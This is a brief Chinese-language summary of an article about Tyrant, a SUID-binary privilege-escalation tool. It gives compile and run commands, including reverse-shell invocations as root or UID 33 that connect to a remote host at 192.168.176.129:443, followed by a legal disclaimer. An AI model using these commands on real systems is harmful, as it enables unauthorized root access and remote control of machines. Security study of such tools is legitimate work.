Tyrant(暴君) SUID二进制文件权限提升工具
💡
原文中文,约900字,阅读约需3分钟。
📝
内容提要
TyrantTyrant 是一个 SUID 二进制特权升级工具,允许低权限用户获取根权限。支持通过命令编译和运行,并可指定 UID 进行反向 Shell。使用时需遵守网络安全法,作者不承担因使用信息造成的责任。
🎯
关键要点
- TyrantTyrant 是一个 SUID 二进制特权升级工具,允许低权限用户获取根权限。
- 使用命令编译源代码:$ gcc tyrant.c -o tyrant。
- 运行工具以获取当前用户的 UID 和其他用户详细信息:$ ./tyrant。
- 指定 UID 进行反向 Shell,必须结合其他漏洞使用。
- 以根权限启动反向 Shell 的命令:# ./tyrant -uid 0 -rhost 192.168.176.129 -rport 443。
- 可以通过指定其他 UID 切换到不同用户:# ./tyrant -uid 33 -rhost 192.168.176.129 -rport 443。
- 免责声明:技术信息仅供参考,使用需遵守《中华人民共和国网络安全法》。
- 文中技术内容可能不适用于所有情况,需充分测试和评估。
- 文章内容可能存在滞后性,读者需自行判断信息的时效性。
➡️
